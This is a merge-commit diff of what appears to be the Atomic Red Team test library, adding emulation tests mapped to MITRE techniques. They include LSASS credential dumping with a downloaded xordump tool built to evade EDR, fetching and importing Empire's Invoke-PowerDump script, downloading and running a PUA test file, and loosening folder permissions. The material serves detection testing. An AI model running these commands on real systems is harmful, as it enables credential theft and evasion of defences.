Merge branch 'master' into T1562.001_Test1_cleanup

2021-05-21 13:44:48 -06:00
parent 5a39c2c7f6 1c49270032
commit e4666db0ed
25 changed files with 446 additions and 59 deletions
@@ -208,14 +208,14 @@ GEM
      rb-fsevent (~> 0.10, >= 0.10.3)
      rb-inotify (~> 0.9, >= 0.9.10)
    mercenary (0.3.6)
-    mini_portile2 (2.5.0)
+    mini_portile2 (2.5.1)
    minima (2.5.1)
      jekyll (>= 3.5, < 5.0)
      jekyll-feed (~> 0.9)
      jekyll-seo-tag (~> 2.1)
    minitest (5.14.2)
    multipart-post (2.1.1)
-    nokogiri (1.11.1)
+    nokogiri (1.11.4)
      mini_portile2 (~> 2.5.0)
      racc (~> 1.4)
    octokit (4.19.0)
@@ -228,6 +228,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
 credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
 credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
 credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -412,7 +413,7 @@ defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution -
 defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
 defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
 defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
-defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
+defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
 defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
 defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
 defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
@@ -642,10 +643,11 @@ discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7b
 discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
 discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
 discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
-discovery,T1135,Network Share Discovery,2,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
-discovery,T1135,Network Share Discovery,3,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
-discovery,T1135,Network Share Discovery,4,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
-discovery,T1135,Network Share Discovery,5,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
+discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
+discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
+discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
+discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
+discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
 discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
 discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
@@ -680,7 +682,7 @@ discovery,T1518.001,Security Software Discovery,5,Security Software Discovery -
 discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
 discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
 discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
-discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt
+discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
 discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
@@ -732,6 +734,7 @@ execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c
 execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
 execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
 execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
+execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
 execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
 execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
 execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -136,7 +136,7 @@ discovery,T1087.001,Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f
 discovery,T1069.001,Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
 discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
 discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
-discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
+discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
 discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
 discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
@@ -84,7 +84,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500
 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
 defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
-defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
+defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
@@ -133,7 +133,7 @@ discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b3
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
 discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
-discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt
+discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
 discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
 discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
 discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
@@ -26,6 +26,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
 credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
 credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
 credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -455,10 +456,10 @@ discovery,T1069.001,Local Groups,2,Basic Permission Groups Discovery Windows (Lo
 discovery,T1069.001,Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
 discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
 discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
-discovery,T1135,Network Share Discovery,2,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
-discovery,T1135,Network Share Discovery,3,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
-discovery,T1135,Network Share Discovery,4,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
-discovery,T1135,Network Share Discovery,5,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
+discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
+discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
+discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
+discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
 discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
 discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
@@ -535,6 +536,7 @@ execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c
 execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
 execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
 execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
+execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
 execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
 execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
 execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -450,6 +450,7 @@
  - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
  - Atomic Test #10: Powershell Mimikatz [windows]
  - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+  - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)
@@ -1123,11 +1124,12 @@
  - Atomic Test #3: Port Scan NMap for Windows [windows]
  - Atomic Test #4: Port Scan using python [windows]
 - [T1135 Network Share Discovery](../../T1135/T1135.md)
-  - Atomic Test #1: Network Share Discovery [macos, linux]
-  - Atomic Test #2: Network Share Discovery command prompt [windows]
-  - Atomic Test #3: Network Share Discovery PowerShell [windows]
-  - Atomic Test #4: View available share drives [windows]
-  - Atomic Test #5: Share Discovery with PowerView [windows]
+  - Atomic Test #1: Network Share Discovery [macos]
+  - Atomic Test #2: Network Share Discovery - linux [linux]
+  - Atomic Test #3: Network Share Discovery command prompt [windows]
+  - Atomic Test #4: Network Share Discovery PowerShell [windows]
+  - Atomic Test #5: View available share drives [windows]
+  - Atomic Test #6: Share Discovery with PowerView [windows]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #1: Packet Capture Linux [linux]
  - Atomic Test #2: Packet Capture macOS [macos]
@@ -1327,6 +1329,7 @@
  - Atomic Test #5: Office launching .bat file from AppData [windows]
  - Atomic Test #6: Excel 4 Macro [windows]
  - Atomic Test #7: Headless Chrome code execution via VBA [windows]
+  - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
 - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1106 Native API](../../T1106/T1106.md)
  - Atomic Test #1: Execution through API - CreateProcess [windows]
@@ -408,7 +408,7 @@
  - Atomic Test #1: Port Scan [linux, macos]
  - Atomic Test #2: Port Scan Nmap [linux, macos]
 - [T1135 Network Share Discovery](../../T1135/T1135.md)
-  - Atomic Test #1: Network Share Discovery [macos, linux]
+  - Atomic Test #2: Network Share Discovery - linux [linux]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #1: Packet Capture Linux [linux]
 - [T1201 Password Policy Discovery](../../T1201/T1201.md)
@@ -353,7 +353,7 @@
  - Atomic Test #1: Port Scan [linux, macos]
  - Atomic Test #2: Port Scan Nmap [linux, macos]
 - [T1135 Network Share Discovery](../../T1135/T1135.md)
-  - Atomic Test #1: Network Share Discovery [macos, linux]
+  - Atomic Test #1: Network Share Discovery [macos]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #2: Packet Capture macOS [macos]
 - [T1201 Password Policy Discovery](../../T1201/T1201.md)
@@ -50,6 +50,7 @@
  - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
  - Atomic Test #10: Powershell Mimikatz [windows]
  - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+  - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)
@@ -828,10 +829,10 @@
  - Atomic Test #3: Port Scan NMap for Windows [windows]
  - Atomic Test #4: Port Scan using python [windows]
 - [T1135 Network Share Discovery](../../T1135/T1135.md)
-  - Atomic Test #2: Network Share Discovery command prompt [windows]
-  - Atomic Test #3: Network Share Discovery PowerShell [windows]
-  - Atomic Test #4: View available share drives [windows]
-  - Atomic Test #5: Share Discovery with PowerView [windows]
+  - Atomic Test #3: Network Share Discovery command prompt [windows]
+  - Atomic Test #4: Network Share Discovery PowerShell [windows]
+  - Atomic Test #5: View available share drives [windows]
+  - Atomic Test #6: Share Discovery with PowerView [windows]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
  - Atomic Test #4: Windows Internal Packet Capture [windows]
@@ -981,6 +982,7 @@
  - Atomic Test #5: Office launching .bat file from AppData [windows]
  - Atomic Test #6: Excel 4 Macro [windows]
  - Atomic Test #7: Headless Chrome code execution via VBA [windows]
+  - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
 - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1106 Native API](../../T1106/T1106.md)
  - Atomic Test #1: Execution through API - CreateProcess [windows]
@@ -20953,6 +20953,43 @@ credential-access:
          & "#{createdump_exe}" -u -f #{output_file} $ID
        cleanup_command: 'del #{output_file}

+'
+        name: powershell
+        elevation_required: true
+    - name: Dump LSASS.exe using imported Microsoft DLLs
+      auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
+      description: "The memory of lsass.exe is often dumped for offline credential
+        theft attacks. This can be achieved by\nimporting built-in DLLs and calling
+        exported functions. Xordump will re-read the resulting minidump \nfile and
+        delete it immediately to avoid brittle EDR detections that signature lsass
+        minidump files.\n\nUpon successful execution, you should see the following
+        file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        xordump_exe:
+          description: Path to xordump
+          type: Path
+          default: C:\Windows\Temp\xordump.exe
+        output_file:
+          description: Path where resulting dump should be placed
+          type: Path
+          default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+      dependencies:
+      - description: 'Computer must have xordump.exe
+
+'
+        prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe"
+          -OutFile #{xordump_exe}
+
+'
+      executor:
+        command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
+        cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
+
 '
        name: powershell
        elevation_required: true
@@ -22732,7 +22769,7 @@ credential-access:
          Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
          Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
          Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
-          Import-Module .\PowerDump.ps1
+          Import-Module "$Env:Temp\PowerDump.ps1"
          Invoke-PowerDump
        name: powershell
        elevation_required: true
@@ -32908,7 +32945,7 @@ defense-evasion:
          description: Key we create that is used to create the CA certificate
          type: Path
          default: rootCA.key
-      dependency_executor_name: command_prompt
+      dependency_executor_name: sh
      dependencies:
      - description: 'Verify the certificate exists. It generates if not on disk.

@@ -32941,7 +32978,7 @@ defense-evasion:
          description: Key we create that is used to create the CA certificate
          type: Path
          default: rootCA.key
-      dependency_executor_name: command_prompt
+      dependency_executor_name: sh
      dependencies:
      - description: 'Verify the certificate exists. It generates if not on disk.

@@ -32957,7 +32994,7 @@ defense-evasion:
          "#{cert_filename}"

 '
-        name: command_prompt
+        name: sh
        elevation_required: true
    - name: Install root CA on Windows
      auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
@@ -42958,8 +42995,27 @@ defense-evasion:
          description: Path of folder to recursively set permissions on
          type: path
          default: C:\Users\Public\*
+        file_path:
+          description: Path of folder permission back
+          type: Path
+          default: "%temp%\\T1222.001-folder-perms-backup.txt"
+      dependency_executor_name: command_prompt
+      dependencies:
+      - description: 'Backup of original folder permissions should exist (for use
+          in cleanup commands)
+
+'
+        prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
+
+'
+        get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1
+
+'
      executor:
        command: icacls "#{path}" /grant Everyone:F /T /C /Q
+        cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1
+
+'
        name: command_prompt
        elevation_required: true
  T1220:
@@ -47503,7 +47559,6 @@ discovery:
 '
      supported_platforms:
      - macos
-      - linux
      input_arguments:
        computer_name:
          description: Computer name to find a mount on.
@@ -47515,6 +47570,38 @@ discovery:
          smbutil view -g //#{computer_name}
          showmount #{computer_name}
        name: sh
+    - name: Network Share Discovery - linux
+      auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae
+      description: 'Network Share Discovery using smbstatus
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        package_checker:
+          description: Package checking command. Debian - dpkg -s samba
+          type: string
+          default: rpm -q samba
+        package_installer:
+          description: Package installer command. Debian - apt install samba
+          type: string
+          default: yum install -y samba
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Package with smbstatus (samba) must exist on device
+
+'
+        prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
+          1; fi
+
+'
+        get_prereq_command: "sudo #{package_installer} \n"
+      executor:
+        command: 'smbstatus --shares
+
+'
+        name: bash
+        elevation_require: true
    - name: Network Share Discovery command prompt
      auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
      description: |
@@ -48719,7 +48806,7 @@ discovery:
      supported_platforms:
      - macos
      executor:
-        name: command_prompt
+        name: sh
        elevation_required: false
        command: |-
          /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
@@ -54438,6 +54525,38 @@ execution:
          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
          Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
        name: powershell
+    - name: Potentially Unwanted Applications (PUA)
+      auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295
+      description: 'The Potentially Unwanted Applications (PUA) protection feature
+        in antivirus software can identify and block PUAs from downloading and installing
+        on endpoints in your network. These applications are not considered viruses,
+        malware, or other types of threats, but might perform actions on endpoints
+        that adversely affect their performance or use. This file is similar to EICAR
+        test virus file, but is considered a Potentially Unwanted Application (PUA)
+        instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify
+        anti-pua protection).
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        pua_url:
+          description: url to PotentiallyUnwanted.exe
+          type: url
+          default: http://amtso.eicar.org/PotentiallyUnwanted.exe
+        pua_file:
+          description: path to PotentiallyUnwanted.exe
+          type: Path
+          default: "$env:TEMP/PotentiallyUnwanted.exe"
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
+          & "#{pua_file}"
+        cleanup_command: 'Remove-Item #{pua_file}
+
+'
  T1204.001:
    technique:
      created: '2020-03-11T14:43:31.706Z'
@@ -48,6 +48,8 @@ The following SSPs can be used to access credentials:

 - [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe)

+- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
+

 <br/>

@@ -564,4 +566,54 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec



+<br/>
+<br/>
+
+## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump 
+file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| xordump_exe | Path to xordump | Path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
+| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+#{xordump_exe} -out #{output_file} -x 0x41
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item ${output_file} -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Computer must have xordump.exe
+##### Check Prereq Commands:
+```powershell
+if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+```
+
+
+
+
 <br/>
@@ -138,6 +138,7 @@ atomic_tests:
      del C:\windows\temp\dumpert.dmp >nul 2> nul
    name: command_prompt
    elevation_required: true
+
 - name: Dump LSASS.exe Memory using Windows Task Manager
  auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
  description: |
@@ -158,6 +159,7 @@ atomic_tests:
      3. Dump lsass.exe memory:
        Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
    name: manual
+
 - name: Offline Credential Theft With Mimikatz
  auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
  description: |
@@ -354,3 +356,37 @@ atomic_tests:
      del #{output_file}
    name: powershell
    elevation_required: true  
+
+- name: Dump LSASS.exe using imported Microsoft DLLs
+  auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
+  description: |
+    The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+    importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump 
+    file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+    Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+  supported_platforms:
+  - windows
+  input_arguments:
+    xordump_exe:
+      description: Path to xordump
+      type: Path
+      default: C:\Windows\Temp\xordump.exe
+    output_file:
+      description: Path where resulting dump should be placed
+      type: Path
+      default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+  dependencies:
+  - description: |
+      Computer must have xordump.exe
+    prereq_command: |
+      if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+  executor:
+    command: |
+      #{xordump_exe} -out #{output_file} -x 0x41
+    cleanup_command: |
+      Remove-Item ${output_file} -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
@@ -179,7 +179,7 @@ Executes a hashdump by reading the hasshes from the registry.
 Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
 Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
